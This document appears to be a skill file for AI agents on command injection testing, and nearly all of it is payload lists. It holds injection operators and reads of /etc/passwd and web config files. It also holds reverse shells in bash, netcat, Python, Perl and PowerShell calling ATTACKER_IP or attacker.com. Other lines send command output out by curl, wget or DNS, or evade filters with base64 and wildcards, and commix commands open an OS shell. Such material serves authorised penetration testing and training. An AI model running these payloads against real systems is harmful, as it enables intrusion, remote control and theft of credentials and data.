| name | command-injection |
| description | Command injection testing methodology covering OS command injection, code injection, filter evasion, blind command injection, and shell-specific techniques for bash, PowerShell, and cmd.exe. |
Command Injection Testing Methodology
Overview
Command Injection allows attackers to execute arbitrary commands on the host operating system. This skill covers OS command injection, code injection, and bypass techniques.
Detection Techniques
Basic Command Injection
; id
| id
|| id
&& id
$(id)
`id`
Time-Based Detection
; sleep 5
| sleep 5
`sleep 5`
$(sleep 5)
Error-Based Detection
; invalidcommand
| invalidcommand
Boolean-Based Detection
; true
; false
Common Injection Points
Standard Operators
Command; Command
Command | Command
Command || Command
Command && Command
Subshell Operators
$(Command)
`Command`
Command Chaining
; cat /etc/passwd
| cat /etc/passwd
|| cat /etc/passwd
&& cat /etc/passwd
$(cat /etc/passwd)
`cat /etc/passwd`
Payloads by OS
Linux/Unix
Basic Commands:
; id
; whoami
; uname -a
; cat /etc/passwd
; ls -la
; pwd
; env
Information Gathering:
; cat /etc/os-release
; cat /proc/version
; cat /proc/cpuinfo
; ifconfig
; ip addr
; netstat -an
; ss -tulpn
; ps aux
File Operations:
; cat /var/www/html/config.php
; find / -name "*.php" 2>/dev/null
; grep -r "password" /var/www/ 2>/dev/null
Network:
; curl http://attacker.com/?data=$(whoami)
; wget http://attacker.com/?data=$(whoami)
; nc -e /bin/bash attacker.com 4444
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
Reverse Shell:
; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
; nc -e /bin/bash ATTACKER_IP PORT
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
; perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Windows
Basic Commands:
; whoami
; ver
; systeminfo
; dir
; cd
; echo %PATH%
Information Gathering:
; net user
; net localgroup administrators
; ipconfig /all
; netstat -an
; tasklist /v
; net view
; net share
File Operations:
; type C:\Windows\win.ini
; dir /s C:\inetpub\wwwroot\
; findstr /s /i /m "password" C:\inetpub\wwwroot\*.php
Reverse Shell:
; powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Bypass Techniques
Space Filters
;cat${IFS}/etc/passwd
;cat$IFS/etc/passwd
;cat</etc/passwd
;{cat,/etc/passwd}
cat${IFS}/etc/passwd
X=$'cat\x20/etc/passwd'&&eval$X
Character Filters (No slashes)
; cd ..;cd ..;cat etc/passwd
; echo "/etc/passwd" | xxd -p | xxd -r -p | xargs cat
; cat $(echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64")
Command Substitution
; $(printf '%s' 'cat /etc/passwd')
; $(echo 'cat /etc/passwd' | base64 -d)
Encoding
; echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -d | bash
; printf '%s\n' 'cat /etc/passwd' | bash
Wildcard Obfuscation
; /???/??t /???/p?????
; /???/n? -e /???/b??h A.TT.A.C.K.E.R I.P P.O.R.T
Case Variations
; CaT /EtC/pAsSwD
; WhOaMi
Null Bytes
; cat /etc/passwd%00
; cat /etc/passwd%00.txt
Newline Injection
; cat
/etc/passwd
Time-Based (Blind)
; sleep 5
; ping -c 5 127.0.0.1
; timeout 5 whoami
Context-Specific Payloads
URL Context
; curl http://attacker.com/$(whoami)
; wget http://attacker.com/$(whoami) -O /dev/null
JSON Context
{
"cmd": "id; whoami",
"command": "$(id)"
}
XML Context
<command>id; whoami</command>
Shell-Specific
Bash:
; {id,whoami}
; ${IFS} instead of space
PowerShell:
; Invoke-Expression 'whoami'
; iex 'whoami'
; & 'whoami'
; whoami | Out-String
cmd.exe:
& whoami
| whoami
whoami && dir
Blind Command Injection
Time-Based
; sleep 5
; ping -c 5 127.0.0.1
Output-Based (OOB)
; curl http://attacker.com/$(whoami)
; nslookup $(whoami).attacker.com
; wget http://attacker.com/?output=$(cat /etc/passwd | base64 | tr -d '\n')
DNS Exfiltration
; nslookup $(whoami).collaborator.net
; dig +short $(whoami).collaborator.net
File-Based
; cat /etc/passwd > /var/www/html/output.txt
; curl http://target.com/output.txt
Filter Evasion
PHP disable_functions Bypass
LD_PRELOAD:
LD_PRELOAD=/path/to/evil.so cmd
FFI (PHP 7.4+):
$ffi = FFI::cdef("int system(const char *command);", "libc.so.6");
$ffi->system("id");
Imagick:
convert input.png output.png
ProcFS:
/proc/self/environ
/proc/self/fd/
Shell Escape Sequences
\x00\x0a\x0d\x1a
Dangerous Functions by Language
PHP
system()
exec()
passthru()
shell_exec()
proc_open()
popen()
backticks ``
Python
os.system()
os.popen()
subprocess.call()
subprocess.Popen()
commands.getoutput()
commands.getstatusoutput()
Node.js
child_process.exec()
child_process.execSync()
child_process.spawn()
child_process.execFile()
Java
Runtime.exec()
ProcessBuilder
Ruby
`command`
%x(command)
system()
exec()
IO.popen()
Commix Tool Integration
commix -u "http://target.com/page?param=value"
commix -u "http://target.com/page" --data="param=value"
commix -u "http://target.com/page" --cookie="session=value"
commix -u "http://target.com/page?param=value" --technique=classic
commix -u "http://target.com/page?param=value" --os-shell
commix -u "http://target.com/upload" --file-upload="shell.php"
commix -u "http://target.com/page" --headers="User-Agent: value*"
Automation with Tools
Burp Suite
1. Send request to Repeater
2. Test injection points with Intruder
3. Use Command Injection payloads list
Fuzzing
ffuf -u "http://target.com/page?cmd=FUZZ" -w payloads.txt -mc 200
Testing Checklist
References
- OWASP Command Injection
- PortSwigger OS Command Injection Labs
- PayloadsAllTheThings Command Injection
- Commix Documentation